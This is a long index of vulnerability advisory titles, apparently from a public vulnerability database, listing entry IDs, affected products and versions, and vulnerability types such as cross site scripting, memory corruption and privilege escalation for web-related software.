Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150859] Cisco WebEx Network Recording Player/Webex Player on Windows privilege escalation [150833] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting [150831] IBM Tivoli Netcool/OMNIbus_GUI 8.1.0 Web UI cross site scripting [150809] Netgear WNR1000V4 up to 1.1.0.54 Web Management Console setup.cgi cross site request forgery [150808] Netgear WNR1000V4 1.1.0.54 Web Management Console setup.cgi Stored cross site scripting [150757] Webnus Modern Events Calendar Lite Plugin up to 5.1.6 on WordPress Stored cross site scripting [150733] Pablo Quick 'n Easy Web Server 3.3.8 HTTP Service quickweb.exe memory corruption [150694] Apple iCloud up to 10.9.1 on Windows WebKit Page Loading memory corruption [150692] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150691] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150690] Apple iCloud up to 10.9.1 on Windows WebKit memory corruption [150689] Apple iCloud up to 10.9.1 on Windows WebKit Universal cross site scripting [150675] Apple tvOS up to 13.3.0 WebKit Page Loading memory corruption [150674] Apple tvOS up to 13.3.0 WebKit Universal cross site scripting [150673] Apple tvOS up to 13.3.0 WebKit memory corruption [150672] Apple tvOS up to 13.3.0 WebKit memory corruption [150671] Apple tvOS up to 13.3.0 WebKit memory corruption [150614] Apple iCloud up to 7.16 on Windows WebKit Page Loading DOM-Based memory corruption [150613] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150612] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150611] Apple iCloud up to 7.16 on Windows WebKit memory corruption [150610] Apple iCloud up to 7.16 on Windows WebKit Universal cross site scripting [150554] Cisco NX-OS Management Interface Improper Control of Resource Through Lifetime [150540] IBM Sterling B2B Integrator Standard Edition up to 5.2.6.5 Web UI cross site scripting [150539] IBM WebSphere Service Registry/Repository 8.5 information disclosure [150511] 10Web Photo Gallery Plugin up to 1.5.45 on WordPress Stored cross site scripting [150503] Moxa AWK-3131A 1.13 Web Authentication weak authentication [150502] Moxa AWK-3131A 1.13 iw_webs privilege escalation [150501] Moxa AWK-3131A 1.13 iw_webs memory corruption [150497] Moxa AWK-3131A 1.13 iw_webs privilege escalation [150496] Moxa AWK-3131A 1.13 iwwebs Reflected privilege escalation [150343] IBM Maximo Asset Management 7.6.0/7.6.1 Web UI cross site scripting [150333] Synacor Zimbra Collaboration Suite up to 8.8.15 Patch 6 WebEx Zimlet privilege escalation [150299] Horde Groupware Webmail Edition 5.2.22 CSV Data privilege escalation [150141] Lexmark MS812 Embedded Web Server Stored cross site scripting [149975] Siemens SIMATIC S7-1200 CPU up to V4.1) Web Server denial of service [149923] Microsoft Windows up to Server 2019 Network Driver Interface Specification information disclosure [149914] Microsoft Exchange Server 2013 CU23/2016 CU14/2016 CU15/2019 CU3/2019 CU4 Exchange Web Services privilege escalation [149859] Rumpus FTP Server 8.2.9.1 Web File Manager WebSettingsGeneralSet.html Stored cross site scripting [149858] Rumpus FTP Server 8.2.9.1 Web File Manager TriggerServerFunction.html cross site request forgery [149857] Rumpus FTP Server 8.2.9.1 Web File Manager TriggerServerFunction.html cross site request forgery [149856] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/BlockedClients.html cross site request forgery [149855] Rumpus FTP Server 8.2.9.1 Web File Manager EventNoticesSet.html cross site request forgery [149854] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/FTPSettingsSet.html cross site request forgery [149853] Rumpus FTP Server 8.2.9.1 Web File Manager WebSettingsGeneralSet.html cross site request forgery [149852] Rumpus FTP Server 8.2.9.1 Web File Manager RAPR/FolderSetsSet.html cross site request forgery [149851] Rumpus FTP Server 8.2.9.1 Web File Manager cross site request forgery [149850] Rumpus FTP Server 8.2.9.1 Web File Manager Reflected cross site scripting [149755] Bestwebsoft htaccess Plugin up to 1.8.1 on WordPress admin.php cross site request forgery [149712] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 information disclosure [149696] Squid Web Proxy up to 4.9 NTLM Authentication ext_lm_group_acl privilege escalation [149695] Squid Web Proxy up to 4.9 Reverse Proxy memory corruption [149694] Squid Web Proxy up to 4.9 information disclosure [149678] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 File Name privilege escalation [149668] IBM Security Identity Manager 6.0.0 Web UI cross site scripting [149650] Squid Web Proxy up to 4.9 FTP Server information disclosure [149611] Icewarp WebMail Server up to 11.4.4.1 /webmail/ cross site scripting [149598] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 denial of service [149535] WebSphere Deployer Plugin up to 1.6.1 on Jenkins XML Parser XML External Entity [149411] TOTOLINK/CIK TELECOM/KCTVJEJU/Hi-Wifi/HCN/T-broad Router Administration Interface Config information disclosure [149365] Cisco Webex Meetings Suite/Webex Meetings Online privilege escalation [149361] Cisco Webex Teams Client on Windows denial of service [149343] Cisco SD-WAN Solution WebUI privilege escalation [149258] Forcepoint Web Security 8.x Header cross site scripting [149125] Amcrest Web Server 2.520.AC00.18.R 2017-06-29 WEB 3.2.1.453504 weak authentication [149047] Juniper Junos J-Web cross site scripting [149046] Juniper Junos J-Web directory traversal [149024] Adobe Experience Manager up to 6.5 User Interface information disclosure [149015] Oracle Secure Global Desktop 5.4/5.5 Web Server cross site scripting [148997] Oracle Secure Global Desktop 5.4/5.5 Web Services privilege escalation [148987] Oracle Agile PLM Framework 37689 Web Services privilege escalation [148904] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC cross site scripting [148903] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC cross site scripting [148902] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC information disclosure [148874] Oracle Health Sciences Data Management Workbench 2.4/2.5 User Interface unknown vulnerability [148866] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console denial of service [148865] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [148863] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 WLS Core Components unknown vulnerability [148862] Oracle WebLogic Server 10.3.6.0.0 WLS Core Components unknown vulnerability [148861] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 Console unknown vulnerability [148852] Oracle Business Intelligence Enterprise Edition 11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Analytics Server/Analytics Web General information disclosure [148851] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI unknown vulnerability [148848] Oracle HTTP Server 11.1.1.9.0/12.1.3.0.0/12.2.1.3.0 Web Listener unknown vulnerability [148843] Oracle WebCenter Sites 12.2.1.3.0 Advanced UI denial of service [148841] Oracle WebLogic Server 10.3.6.0.0 WLS Core Components unknown vulnerability [148839] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Third Party Tools denial of service [148838] Oracle WebLogic Server 12.2.1.3.0/12.2.1.4.0 Web Container information disclosure [148832] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0 Application Container - JavaEE unknown vulnerability [148831] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0/12.2.1.4.0 WLS Core Components unknown vulnerability [148806] Oracle Financial Services Funds Transfer Pricing up to 8.0.7 Web Service privilege escalation [148803] Oracle Enterprise Manager Base Platform 12.1.0.5/13.2.0.0/13.3.0.0 Command Line Interface unknown vulnerability [148798] Oracle Enterprise Manager for Database 12.1.0.5/13.2.0.0/13.3.0.0 Change Manager - web based denial of service [148764] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps cross site scripting [148759] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps denial of service [148757] Oracle Application Testing Suite 12.5.0.3/13.1.0.1/13.2.0.1/13.3.0.1 Load Testing for Web Apps unknown vulnerability [148731] Oracle WebAccess unknown vulnerability [148728] Oracle Web Access cross site scripting [148602] InAppBrowser Webview on Android gap-iab URI privilege escalation [148590] CTHthemes CityBook Theme on WordPress Website Persistent cross site scripting [148571] Cisco IOS/IOS XE up to 16.1.0 Web UI cross site request forgery [148383] TP-LINK TL-WR841N Web Service memory corruption [148285] Icewarp WebMail Server up to 12.2.1.0 Object Note cross site scripting [148284] Icewarp WebMail Server up to 12.2.1.0 Contact Note cross site scripting [148275] Telos Automated Message Handling System up to 4.1.5.4 Web Page Generator ModalWindowPopup.asp cross site scripting [148273] Telos Automated Message Handling System up to 4.1.5.4 Web Page Generator uploaditem.asp cross site scripting [147943] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [147882] OpenShift Enterprise 1.2 Web Console cross site request forgery [147838] Video Comments Webcam Recorder Plugin up to 1.54 on WordPress r_logout.php cross site scripting [147821] Insteon Hub 2242-222 Web/API privilege escalation [147590] IBM Financial Transaction Manager 3.0 Web UI cross site scripting [147586] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [147444] Apple macOS 10.14 Web Page History information disclosure [147291] WebSphere Deployer Plugin up to 1.6.1 on Jenkins SSL/TLS Certificate Validator weak authentication [147290] WebSphere Deployer Plugin up to 1.6.1 on Jenkins cross site request forgery [147289] WebSphere Deployer Plugin up to 1.6.1 on Jenkins Permission Check privilege escalation [147236] Solarwinds Serv-U FTP Server 15.1.7 Web UI Stored cross site scripting [147235] Solarwinds Serv-U FTP Server 15.1.7 Web UI privilege escalation [147177] eGain Web Email API 11+ Message /system/ws/v11/ss/email) Header Injection privilege escalation [147153] Advantech WebAccess up to 8.4.2 memory corruption [147137] Siemens SPPA-T3000 Application Server Web Services Directory information disclosure [147093] Siemens SPPA-T3000 Application Server RMI interface privilege escalation [147027] Avaya IP Office Application Server up to 10.x Web UI cross site scripting [147019] IBM Spectrum Scale 4.2/5.0 Web UI cross site scripting [146943] JBossWeb Bayeux Reflected cross site scripting [146852] IBM WebSphere Application Server Web UI cross site scripting [146643] Goahead Web Server 3.6.5/4.1.1/5.0.1 Multi-Part Request denial of service [146642] Goahead Web Server 3.6.5/4.1.1/5.0.1 Multi-Part Request memory corruption [146639] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting [146638] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting [146636] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting [146634] IBM Cloud Pak System 2.3/2.3.0.1 Web UI cross site scripting [146433] Squid Web Proxy up to 2.x/3.x/4.8 HTTP Digest Authentication information disclosure [146432] Squid Web Proxy up to 3.x/4.8 URL privilege escalation [146431] Squid Web Proxy up to 3.x/4.8 Hostname cross site request forgery [146430] Squid Web Proxy up to 3.x/4.8 URI Scheme privilege escalation [146397] Kaspersky Anti-Virus up to 2020 Web Protection Redirect [146396] Kaspersky Anti-Virus up to 2020 Web Protection information disclosure [146394] Kaspersky Anti-Virus up to 2020 Web Protection privilege escalation [146389] Squid Web Proxy up to 4.8 URN Response memory corruption [146388] Squid Web Proxy up to 4.8 Access Check privilege escalation [146338] Cisco Webex Meeting WebEx Network Recording Admin Page privilege escalation [146332] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [146331] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [146317] Ruby up to 1.8.7/1.9.2 Log File WEBrick::HTTPRequest privilege escalation [146169] IBM Tivoli Netcool Impact up to 7.1.0.16 Web UI cross site scripting [146153] Sangoma Asterisk/Certified Asterisk Asterisk Manager Interface manager.c privilege escalation [146010] Schneider Electric Andover Continuum Web Server cross site scripting [146009] Schneider Electric Modicon M340 CPU Web Server information disclosure [146002] CODESYS Web Server up to 3.5.15.19 memory corruption [145571] Moodle up to 2.2.1 Web Services privilege escalation [145490] Enghouse Web Chat 6.2.284.34 Remote File Inclusion information disclosure [145489] Enghouse Web Chat 6.1.300.31/6.2.284.34 cross site scripting [145488] Enghouse Web Chat 6.1.300.31/6.2.284.34 Chat Log privilege escalation [145487] Enghouse Web Chat 6.1.300.31 privilege escalation [145282] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [145281] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting [145278] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting [145277] IBM QRadar 7.3.0/7.3.1/7.3.2 Web UI cross site scripting [145249] IBM Cognos Analytics 11.0/11.1 Web Server privilege escalation [145101] TYPO3 up to 4.3.11/4.4.8/4.5.3 Webserver privilege escalation [144988] Cisco TelePresence Advanced Media Gateway Web Application privilege escalation [144969] Horde Groupware Webmail Edition up to 5.1.2 basic.php cross site request forgery [144944] Horde Groupware Webmail Edition 5.1.2 Permission edit.php cross site request forgery [144943] Horde Groupware Webmail Edition Virtual Address Book search.php cross site request forgery [144798] F5 BIG-IP up to 11.6.5.1/12.1.5/13.1.3.1 Traffic Management User Interface Reflected cross site scripting [144649] Apple iCloud up to 10.7 on Windows WebKit Process Model memory corruption [144648] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144647] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144646] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144645] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144644] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144643] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144642] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144641] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144640] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144639] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144638] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144637] Apple iCloud up to 10.7 on Windows WebKit memory corruption [144636] Apple iCloud up to 10.7 on Windows WebKit Universal cross site scripting [144633] Apple iCloud up to 7.14 on Windows WebKit Process Model memory corruption [144632] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144631] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144630] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144629] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144628] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144627] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144626] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144625] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144624] Apple iCloud up to 7.14 on Windows WebKit memory corruption [144589] Apple watchOS up to 6.0.1 WebKit memory corruption [144588] Apple watchOS up to 6.0.1 WebKit memory corruption [144587] Apple watchOS up to 6.0.1 WebKit memory corruption [144586] Apple watchOS up to 6.0.1 WebKit memory corruption [144585] Apple watchOS up to 6.0.1 WebKit memory corruption [144584] Apple watchOS up to 6.0.1 WebKit memory corruption [144583] Apple watchOS up to 6.0.1 WebKit memory corruption [144582] Apple watchOS up to 6.0.1 WebKit memory corruption [144581] Apple watchOS up to 6.0.1 WebKit Universal cross site scripting [144527] Apple tvOS up to 13.0 WebKit Process Model memory corruption [144526] Apple tvOS up to 13.0 WebKit memory corruption [144525] Apple tvOS up to 13.0 WebKit memory corruption [144524] Apple tvOS up to 13.0 WebKit memory corruption [144523] Apple tvOS up to 13.0 WebKit memory corruption [144522] Apple tvOS up to 13.0 WebKit memory corruption [144521] Apple tvOS up to 13.0 WebKit memory corruption [144520] Apple tvOS up to 13.0 WebKit memory corruption [144519] Apple tvOS up to 13.0 WebKit memory corruption [144518] Apple tvOS up to 13.0 WebKit memory corruption [144517] Apple tvOS up to 13.0 WebKit memory corruption [144516] Apple tvOS up to 13.0 WebKit memory corruption [144515] Apple tvOS up to 13.0 WebKit memory corruption [144514] Apple tvOS up to 13.0 WebKit Universal cross site scripting [144157] Horde Groupware Webmail Edition up to 5.2.22 Trean trean/ cross site request forgery [144151] IBM Maximo Asset Management 7.6 Web UI cross site scripting [144150] IBM Cloud Orchestrator/Cloud Orchestrator Enterprise up to 2.5.0.9 Web UI cross site scripting [144131] Horde Groupware Webmail Edition up to 5.2.22 Tag Cloud user.php cross site scripting [144078] Jenkins Deploy WebLogic Plugin Permission Check privilege escalation [144077] Deploy WebLogic Plugin on Jenkins cross site request forgery [144019] indieweb-post-kinds Plugin up to 1.3.1.0 on WordPress genericons/example.html cross site scripting [144004] Citrix Application Delivery Controller/Gateway up to 10.5/11.1/12.0/12.1 Management Interface weak authentication [143832] D-Link DIR-866L 1.03B04 Common Gateway Interface HtmlResponseMessage cross site scripting [143643] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 Web Services information disclosure [143641] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 TFA Collectorjackson-databind information disclosure [143637] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting [143636] Oracle WebLogic Server 12.2.1.3.0 JavaServer Faces cross site scripting [143635] Oracle WebLogic Server 12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting [143634] Oracle WebLogic Server 12.2.1.3.0 OpenSSH information disclosure [143633] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 jQuery cross site scripting [143626] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 jackson-databind unknown vulnerability [143617] Oracle WebCenter Portal 12.2.1.3.0 jackson-databind information disclosure [143612] Oracle WebLogic Server 10.3.6.0.0/12.1.3.0.0/12.2.1.3.0 OpenSSL unknown vulnerability [143567] Oracle up to 15.2.18/16.2.18/17.12.14/18.8.11 Web Access information disclosure [143265] cPanel up to 82.0.14 WHM Update Preferences Interface cross site scripting [143264] cPanel up to 82.0.14 WHM SSL Storage Manager Interface Stored cross site scripting [143263] cPanel up to 82.0.14 SSL Key Delete Interface cross site scripting [143212] Juniper Junos J-Web weak authentication [143201] Juniper Junos J-Web Persistent cross site scripting [142982] WebARX Plugin 1.3.0 on WordPress URI privilege escalation [142981] WebARX Plugin 1.3.0 on WordPress Stored cross site scripting [142966] Signal Messenger up to 4.47.7 WebRTC privilege escalation [142934] KSLabs KSWEB 3.93 on Android Ajax privilege escalation [142892] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Stack Trace information disclosure [142859] Cisco ASA/Firepower Threat Defense WebVPN denial of service [142856] Cisco ASA/Firepower Threat Defense WebVPN Portal cross site scripting [142852] Cisco FirePOWER Management Center Web UI privilege escalation [142850] Cisco FirePOWER Management Center Web UI memory corruption [142849] Cisco FirePOWER Management Center Web UI memory corruption [142824] IBM Security Directory Server 6.4.0 Web UI cross site scripting [142800] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting [142799] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting [142798] IBM Jazz Reporting Service up to 6.0.6.1 Web UI cross site scripting [142764] IBM WebSphere Application Server Liberty Cookie privilege escalation [142763] IBM WebSphere Application Server Liberty Session weak authentication [142761] IBM WebSphere eXtreme Scale 8.6 Admin API cross site scripting [142759] IBM WebSphere eXtreme Scale 8.6 Admin Console Improper Restriction of Rendered UI Layers [142758] IBM WebSphere eXtreme Scale 8.6 Admin Console cross site scripting [142737] Western Digital SSD Dashboard/SanDisk SSD Dashboard up to 2.5.0 Web Service privilege escalation [142382] D-Link DIR-655C/DIR-866L/DIR-652/DHP-1565 Common Gateway Interface privilege escalation [142329] Honeywell Performance IP Cameras/Performance NVR Integrated Web Server information disclosure [142318] F5 BIG-IP up to 11.6.5/12.1.5/13.1.3/14.1.2 Management Interface privilege escalation [142313] Advantech WebAccess/HMI Designer 2.1.9.31 Exception privilege escalation [142312] Advantech WebAccess/HMI Designer 2.1.9.31 User Mode memory corruption [142311] Advantech WebAccess/HMI Designer 2.1.9.31 GetNICInfo+0x0000000000512918 memory corruption [142292] Cisco IOS/IOS XE Web Framework Stored cross site scripting [142291] Cisco IOS XE Web Framework Stored cross site scripting [142288] Cisco IOS XE Dialer Interface Feature for ISDN weak authentication [142280] Cisco IOS/IOS XE IOx Web Server privilege escalation [142084] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Network Deployment information disclosure [142063] websimon-tables Plugin up to 1.3.4 on WordPress wp-admin/tools.php cross site scripting [141975] Advantech WebAccess up to 8.4.1 privilege escalation [141974] Advantech WebAccess up to 8.4.1 memory corruption [141973] Advantech WebAccess up to 8.4.1 privilege escalation [141972] Advantech WebAccess up to 8.4.1 privilege escalation [141932] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Log information disclosure [141931] IBM WebSphere Application Server 0/7.0/8.0/8.5/9 directory traversal [141930] IBM Cognos Analytics 11.0/11.1 Web UI cross site scripting [141929] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Pollution privilege escalation [141928] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting [141927] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 URL directory traversal [141723] McAfee Web Gateway up to 7.8.2.12 Administrators Web Console Reflected cross site scripting [141690] McAfee Web Gateway up to 7.8.2.12 Scanning Proxy privilege escalation [141689] McAfee Web Gateway up to 7.8.2.12 Scanning Proxy privilege escalation [141613] Microsoft Exchange Server 2016 CU12/2016 CU13/2019 CU1/2019 CU2 Outlook Web App privilege escalation [141544] Advantech WebAccess/SCADA 8.4.1 RPC Message memory corruption [141519] SAP NetWeaver Application Server Java Web Container privilege escalation [141476] D-Link DIR-868L REVB/DIR-885L REVA/DIR-895L REVA SharePort Web Access folder_view.php weak authentication [141320] IBM Business Automation Workflow Web UI cross site scripting [141274] Cisco Webex Teams Client on Windows privilege escalation [141266] F5 BIG-IP up to 11.6.4/12.1.4.1/13.1.2/14.0.0.4/14.1.0.5 Management Interface Memory denial of service [141181] webp-express Plugin up to 0.14.7 on WordPress Stored cross site scripting [141178] webp-converter-for-media Plugin up to 1.0.2 on WordPress cross site request forgery [141171] onesignal-free-web-push-notifications Plugin up to 1.17.7 on WordPress cross site scripting [141106] Symantec Reporter Web UI up to 10.3.2.4 Credentials information disclosure [141100] Symantec ASG/ProxySG up to 6.5.10.14/6.6/6.7.4.1 FTP Proxy WebFTP Mode information disclosure [141099] Symantec ASG/ProxySG up to 6.5.10.14/6.6/6.7.4.1 FTP Proxy WebFTP Mode Stored cross site scripting [141087] 1.6.17 on WordPress Purchasing cgi-bin/webscr privilege escalation [141062] WebTorrent up to 0.107.5 HTTP Server cross site scripting [141061] facebook-by-weblizar Plugin up to 2.8.4 on WordPress cross site request forgery [140844] Webmin up to 1.920 rpc.cgi privilege escalation [140843] Webmin up to 1.930 XML Data xmlrpc.cgi XML External Entity [140792] MikroTik RouterOS up to 6.44.5/6.44.3 Management Interface privilege escalation [140791] Rico Printer Web Server memory corruption [140790] Rico Printer Web Server memory corruption [140789] Rico Printer Web Server memory corruption [140788] Rico Printer Web Server memory corruption [140717] Webtoffee WordPress Users 1.3.0 on WordPress WF_CustomerImpExpCsv_Exporter privilege escalation [140680] webp-express Plugin up to 0.14.10 on WordPress information disclosure [140569] Cisco WebEx Meetings Mobile on iOS SSL Certificate weak authentication [140534] Cisco Integrated Management Controller Web-based Management Console privilege escalation [140484] WebLibrarian Plugin up to 3.4.8.6 on WordPress Short Code cross site scripting [140483] WebLibrarian Plugin up to 3.4.8.5 on WordPress Short Code cross site scripting [140482] WebLibrarian Plugin up to 3.4.8.4 on WordPress Short Code cross site scripting [140431] IBM Cloud Private 3.1.1/3.1.2 Web UI cross site scripting [140428] OpenEMR up to 5.0.1 Scanned Forms Interface privilege escalation [140427] OpenEMR up to 5.0.1 Patient File Download Interface directory traversal [140337] Webmin 1.890 privilege escalation [140236] Webmin up to 1.920 password_change.cgi privilege escalation [140127] OSIsoft PI Web API cross site request forgery [140126] OSIsoft PI Web API up to 2018 information disclosure [140112] Squid Web Proxy up to 4.7 Access Protection cachemgr.cgi memory corruption [140085] McAfee Web Gateway up to 7.8.2.11 X-Frame-Options privilege escalation [140083] McAfee Web Gateway up to 7.8.2.11 IFRAME information disclosure [140038] responsive-menu Plugin up to 3.1.3 on WordPress Admin Interface cross site request forgery [140014] simple-fields Plugin up to 1.1 on WordPress Admin Interface cross site request forgery [139984] TIBCO LogLogic Enterprise Virtual Appliance Web Server Persistent cross site request forgery [139786] GCDWebServer up to 3.5.2 GCDWebUploader information disclosure [139744] 10Web Photo Gallery plugin up to 1.5.24 on WordPress admin-ajax.php directory traversal [139743] 10Web Photo Gallery plugin up to 1.5.22 on WordPress Stored cross site scripting [139664] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139663] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139662] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139661] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139660] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139659] Cisco WebEx Network Recording Player/Webex Player on Windows ARF File memory corruption [139630] Wall Display Plugin up to 0.6.34 on Jenkins Web Page Reflected cross site scripting [139627] Build Pipeline Plugin up to 1.5.8 on Jenkins Web Page Stored cross site scripting [139538] cPanel up to 60.0.24 Alias Upload Interface cross site scripting [139504] IBM WebSphere MQ up to 9.1 LTS Messages privilege escalation [139486] cPanel up to 62.0.3 WebMail cross site scripting [139467] cPanel up to 60.0.24 WHM Repair Mailbox Permissions Interface Stored cross site scripting [139370] Advantech WebAccess HMI Designer up to 2.1.9.23 MCR File memory corruption [139356] cPanel up to 62.0.16 WHM cPAddons showsecurity Interface cross site scripting [139354] cPanel up to 62.0.23 WHM cPAddons Install Interface Stored cross site scripting [139309] cPanel up to 67.9999.102 Backup Interface Archive privilege escalation [139308] cPanel up to 67.9999.102 WHM MySQL Password Change Interfaces Stored cross site scripting [139260] cPanel up to 68.0.26 WHM listips Interface cross site scripting [139235] cPanel up to 70.0.22 cpaddons Vendor Interface Stored cross site scripting [139217] cPanel up to 70.0.22 WHM cPAddons showsecurity Interface cross site scripting [139210] cPanel up to 71.9980.36 WHM Backup Configuration Interface cross site scripting [139208] cPanel up to 71.9980.36 WHM Save Theme Interface Stored cross site scripting [139206] cPanel up to 71.9980.36 WHM cPAddons Installation Interface Stored cross site scripting [139189] cPanel up to 11.53.x Webmail API privilege escalation [139184] cPanel up to 11.54.0.3 X3 Entropy Banner Interface cross site scripting [139183] cPanel up to 11.54.0.3 WHM Feature Manager interface Stored cross site scripting [139181] cPanel up to 11.54.0.3 WHM PHP Configuration Editor Interface cross site scripting [139146] cPanel up to 57.9999.53 WebMail privilege escalation [139145] cPanel up to 57.9999.53 WebMail information disclosure [139129] cPanel up to 73.x WHM File Restoration Interface Stored cross site scripting [139122] cPanel up to 74.0.7 WHM Style Upload Interface cross site scripting [139121] cPanel up to 74.0.7 Site Software Moderation Interface cross site scripting [139120] cPanel up to 74.0.7 WHM Security Questions Interface cross site scripting [139068] foreman-tasks up to 0.15.6 Web UI/API weak authentication [139029] IBM WebSphere Application Server Liberty Admin Center privilege escalation [138998] cPanel up to 82.0.1 Modify Account Interface Stored cross site scripting [138995] cPanel up to 82.0.1 Webmail Master Template cross site scripting [138994] cPanel up to 82.0.1 WHM Tomcat Manager Interface Stored cross site scripting [138987] 10Web Photo Gallery plugin up to 1.5.30 on WordPress Filemanager filemanager/model.php sql injection [138974] cPanel up to 76.0.7 MultiPHP Manager Interface Stored cross site scripting [138718] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138717] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138716] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138715] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138714] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138713] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138712] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138711] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138710] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138709] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138708] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138707] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138706] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138705] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138704] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138703] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138702] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138701] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138700] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138699] Apple iCloud up to 7.12/10.5 on Windows WebKit memory corruption [138698] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal cross site scripting [138697] Apple iCloud up to 7.12/10.5 on Windows WebKit Universal information disclosure [138658] Apple tvOS up to 12.3 WebKit memory corruption [138657] Apple tvOS up to 12.3 WebKit memory corruption [138656] Apple tvOS up to 12.3 WebKit memory corruption [138655] Apple tvOS up to 12.3 WebKit memory corruption [138654] Apple tvOS up to 12.3 WebKit memory corruption [138653] Apple tvOS up to 12.3 WebKit memory corruption [138652] Apple tvOS up to 12.3 WebKit memory corruption [138651] Apple tvOS up to 12.3 WebKit memory corruption [138650] Apple tvOS up to 12.3 WebKit memory corruption [138649] Apple tvOS up to 12.3 WebKit memory corruption [138648] Apple tvOS up to 12.3 WebKit memory corruption [138647] Apple tvOS up to 12.3 WebKit memory corruption [138646] Apple tvOS up to 12.3 WebKit memory corruption [138645] Apple tvOS up to 12.3 WebKit memory corruption [138644] Apple tvOS up to 12.3 WebKit memory corruption [138643] Apple tvOS up to 12.3 WebKit memory corruption [138642] Apple tvOS up to 12.3 WebKit 